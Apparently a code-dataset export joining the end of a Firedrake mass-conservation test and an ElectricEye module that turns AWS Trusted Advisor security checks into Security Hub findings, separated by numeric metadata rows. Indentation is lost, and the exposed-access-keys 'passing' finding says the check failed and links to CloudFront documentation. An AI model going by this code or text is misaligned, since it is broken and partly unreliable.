# source term
source = Function(v_h)
w_start = Function(V).assign(state.w)
# timestep
t_end = 0.01
solution = Timestepper(V, state.bed, source, 0.025)
w_end = solution.stepper(0, t_end, state.w, 0.025)
h_start, mu_start, mv_start = split(w_start)
h_end, mu_end, mv_end = split(w_end)
depth_start = Function(v_h).project(h_start)
depth_end = Function(v_h).project(h_end)
mass_diff = np.abs(assemble(depth_start * dx) - assemble(depth_end * dx))
assert mass_diff <= 1e-4
if __name__ == "__main__":
import os
import pytest
pytest.main(os.path.abspath(__file__))
| 22.70297
| 77
| 0.633232
| 365
| 2,293
| 3.747945
| 0.224658
| 0.078947
| 0.083333
| 0.087719
| 0.804094
| 0.767544
| 0.767544
| 0.767544
| 0.767544
| 0.767544
| 0
| 0.033295
| 0.240297
| 2,293
| 100
| 78
| 22.93
| 0.752009
| 0.099869
| 0
| 0.740741
| 0
| 0
| 0.009775
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.037037
| false
| 0
| 0.111111
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c9dfda6eed7fb348a20dac1b4172b930711fc65
| 47,634
|
py
|
Python
|
eeauditor/auditors/aws/AWS_TrustedAdvisor_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/AWS_TrustedAdvisor_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/AWS_TrustedAdvisor_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import botocore
from check_register import CheckRegister
registry = CheckRegister()
# import boto3 clients
support = boto3.client("support")
# loop through WAFs
def describe_trusted_advisor_checks(cache):
response = cache.get("describe_trusted_advisor_checks")
if response:
return response
cache["describe_trusted_advisor_checks"] = support.describe_trusted_advisor_checks(language='en')
return cache["describe_trusted_advisor_checks"]
@registry.register_check("support")
def trusted_advisor_failing_root_mfa_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[TrustedAdvisor.1] Trusted Advisor check results for MFA on Root Account should be investigated"""
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if awsRegion == 'us-east-1':
try:
for t in describe_trusted_advisor_checks(cache=cache)["checks"]:
if str(t["name"]) == "MFA on Root Account":
checkId = str(t["id"])
# this is a failing check
if int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-root-mfa-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
"Title": "[TrustedAdvisor.1] Trusted Advisor check results for MFA on Root Account should be investigated",
"Description": "Trusted Advisor Check for MFA on Root Account with a Check Id of "
+ checkId
+ ". has failed. Trusted Advisor checks the root account and warns if multi-factor authentication (MFA) is not enabled. For increased security, we recommend that you protect your account by using MFA, which requires a user to enter a unique authentication code from their MFA hardware or virtual device when interacting with the AWS console and associated websites. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up MFA refer to the Using multi-factor authentication (MFA) in AWS section of the AWS Identity and Access Management User Guide.",
"Url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3"
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
# this is a passing check
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-root-mfa-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[TrustedAdvisor.1] Trusted Advisor check results for MFA on Root Account should be investigated",
"Description": "Trusted Advisor Check for MFA on Root Account with a Check Id of "
+ checkId
+ ". is passing.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up MFA refer to the Using multi-factor authentication (MFA) in AWS section of the AWS Identity and Access Management User Guide.",
"Url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3"
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
break
else:
continue
except botocore.exceptions.ClientError as error:
if error.response['Error']['Code'] == 'SubscriptionRequiredException':
print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
else:
print(error)
else:
print('AWS Health Global endpoint is located in us-east-1')
@registry.register_check("support")
def trusted_advisor_failing_elb_listener_security_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[TrustedAdvisor.2] Trusted Advisor check results for ELB Listener Security should be investigated"""
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if awsRegion == 'us-east-1':
try:
for t in describe_trusted_advisor_checks(cache=cache)["checks"]:
if str(t["name"]) == "ELB Listener Security":
checkId = str(t["id"])
# this is a failing check
if int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-elb-listener-security-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[TrustedAdvisor.2] Trusted Advisor check results for ELB Listener Security should be investigated",
"Description": "Trusted Advisor Check for ELB Listener Security with a Check Id of "
+ checkId
+ ". has failed. Trusted Advisor checks for load balancers with listeners that do not use recommended security configurations for encrypted communication. AWS recommends using a secure protocol (HTTPS or SSL), up-to-date security policies, and ciphers and protocols that are secure. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up TLS/SSL for ELBv1 refer to the Listeners for your Classic Load Balancer section of the Elastic Load Balancing Classic Load Balancers User Guide.",
"Url": "https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-listener-config.html#elb-listener-protocols"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3"
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
# this is a passing check
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-elb-listener-security-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[TrustedAdvisor.2] Trusted Advisor check results for ELB Listener Security should be investigated",
"Description": "Trusted Advisor Check for ELB Listener Security with a Check Id of "
+ checkId
+ ". is passing.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up TLS/SSL for ELBv1 refer to the Listeners for your Classic Load Balancer section of the Elastic Load Balancing Classic Load Balancers User Guide.",
"Url": "https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-listener-config.html#elb-listener-protocols"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3"
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
break
else:
continue
except botocore.exceptions.ClientError as error:
if error.response['Error']['Code'] == 'SubscriptionRequiredException':
print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
else:
print(error)
else:
print('AWS Health Global endpoint is located in us-east-1')
@registry.register_check("support")
def trusted_advisor_failing_cloudfront_ssl_cert_iam_certificate_store_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[TrustedAdvisor.3] Trusted Advisor check results for CloudFront Custom SSL Certificates in the IAM Certificate Store should be investigated"""
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if awsRegion == 'us-east-1':
try:
for t in describe_trusted_advisor_checks(cache=cache)["checks"]:
if str(t["name"]) == "CloudFront Custom SSL Certificates in the IAM Certificate Store":
checkId = str(t["id"])
# this is a failing check
if int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-cloudfront-ssl-cert-iam-cert-store-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[TrustedAdvisor.3] Trusted Advisor check results for CloudFront Custom SSL Certificates in the IAM Certificate Store should be investigated",
"Description": "Trusted Advisor Check for CloudFront Custom SSL Certificates in the IAM Certificate Store with a Check Id of "
+ checkId
+ ". has failed. Trusted Advisor checks the SSL certificates for CloudFront alternate domain names in the IAM certificate store and alerts you if the certificate is expired, will soon expire, uses outdated encryption, or is not configured correctly for the distribution. When a custom certificate for an alternate domain name expires, browsers that display your CloudFront content might show a warning message about the security of your website. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up HTTPS for CloudFront refer to the Using HTTPS with CloudFront section of the Amazon CloudFront Developer Guide.",
"Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3"
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
# this is a passing check
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-cloudfront-ssl-cert-iam-cert-store-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[TrustedAdvisor.3] Trusted Advisor check results for CloudFront Custom SSL Certificates in the IAM Certificate Store should be investigated",
"Description": "Trusted Advisor Check for CloudFront Custom SSL Certificates in the IAM Certificate Store with a Check Id of "
+ checkId
+ ". is passing.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up HTTPS for CloudFront refer to the Using HTTPS with CloudFront section of the Amazon CloudFront Developer Guide.",
"Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3"
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
break
else:
continue
except botocore.exceptions.ClientError as error:
if error.response['Error']['Code'] == 'SubscriptionRequiredException':
print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
else:
print(error)
else:
print('AWS Health Global endpoint is located in us-east-1')
@registry.register_check("support")
def trusted_advisor_failing_cloudfront_ssl_cert_on_origin_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[TrustedAdvisor.4] Trusted Advisor check results for CloudFront SSL Certificate on the Origin Server should be investigated"""
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if awsRegion == 'us-east-1':
try:
for t in describe_trusted_advisor_checks(cache=cache)["checks"]:
if str(t["name"]) == "CloudFront SSL Certificate on the Origin Server":
checkId = str(t["id"])
# this is a failing check
if int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-cloudfront-ssl-origin-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[TrustedAdvisor.4] Trusted Advisor check results for CloudFront SSL Certificate on the Origin Server should be investigated",
"Description": "Trusted Advisor Check for CloudFront SSL Certificate on the Origin Server with a Check Id of "
+ checkId
+ ". has failed. Trusted Advisor checks your origin server for SSL certificates that are expired, about to expire, missing, or that use outdated encryption. If a certificate is expired, CloudFront responds to requests for your content with HTTP status code 502, Bad Gateway. Certificates that were encrypted by using the SHA-1 hashing algorithm are being deprecated by web browsers such as Chrome and Firefox. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up HTTPS for CloudFront refer to the Using HTTPS with CloudFront section of the Amazon CloudFront Developer Guide.",
"Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3"
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
# this is a passing check
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-failing-cloudfront-ssl-origin-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[TrustedAdvisor.4] Trusted Advisor check results for CloudFront SSL Certificate on the Origin Server should be investigated",
"Description": "Trusted Advisor Check for CloudFront SSL Certificate on the Origin Server with a Check Id of "
+ checkId
+ ". is passing.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about setting up HTTPS for CloudFront refer to the Using HTTPS with CloudFront section of the Amazon CloudFront Developer Guide.",
"Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3"
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
break
else:
continue
except botocore.exceptions.ClientError as error:
if error.response['Error']['Code'] == 'SubscriptionRequiredException':
print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
else:
print(error)
else:
print('AWS Health Global endpoint is located in us-east-1')
@registry.register_check("support")
def trusted_advisor_failing_exposed_access_keys_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[TrustedAdvisor.5] Trusted Advisor check results for Exposed Access Keys should be investigated"""
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
if awsRegion == 'us-east-1':
try:
for t in describe_trusted_advisor_checks(cache=cache)["checks"]:
if str(t["name"]) == "Exposed Access Keys":
checkId = str(t["id"])
# this is a failing check
if int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-expose-iam-keys-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "CRITICAL"},
"Confidence": 99,
"Title": "[TrustedAdvisor.5] Trusted Advisor check results for Exposed Access Keys should be investigated",
"Description": "Trusted Advisor Check for Exposed Access Keys with a Check Id of "
+ checkId
+ ". has failed. Trusted Advisor checks popular code repositories for access keys that have been exposed to the public and for irregular Amazon Elastic Compute Cloud (Amazon EC2) usage that could be the result of a compromised access key. An access key consists of an access key ID and the corresponding secret access key. Exposed access keys pose a security risk to your account and other users. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about rotating access keys refer to the Managing access keys for IAM users section of the AWS Identity and Access Management User Guide.",
"Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3"
]
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE"
}
yield finding
# this is a passing check
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": awsAccountId + checkId + "/trusted-advisor-expose-iam-keys-check",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": awsAccountId + checkId,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[TrustedAdvisor.5] Trusted Advisor check results for Exposed Access Keys should be investigated",
"Description": "Trusted Advisor Check for Exposed Access Keys with a Check Id of "
+ checkId
+ ". has failed. Trusted Advisor checks popular code repositories for access keys that have been exposed to the public and for irregular Amazon Elastic Compute Cloud (Amazon EC2) usage that could be the result of a compromised access key. An access key consists of an access key ID and the corresponding secret access key. Exposed access keys pose a security risk to your account and other users. Refer to the remediation instructions if this configuration is not intended.",
"Remediation": {
"Recommendation": {
"Text": "To learn more about rotating access keys refer to the Managing access keys for IAM users section of the AWS Identity and Access Management User Guide.",
"Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
"Resources": [
{
"Type": "AwsTrustedAdvisorCheck",
"Id": checkId,
"Partition": awsPartition,
"Region": awsRegion
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3"
]
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED"
}
yield finding
break
else:
continue
except botocore.exceptions.ClientError as error:
if error.response['Error']['Code'] == 'SubscriptionRequiredException':
print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
else:
print(error)
else:
print('AWS Health Global endpoint is located in us-east-1')
| 64.896458
| 552
| 0.437419
| 3,988
| 47,634
| 5.201103
| 0.097041
| 0.020249
| 0.030373
| 0.037123
| 0.898178
| 0.892248
| 0.89191
| 0.889355
| 0.886848
| 0.884678
| 0
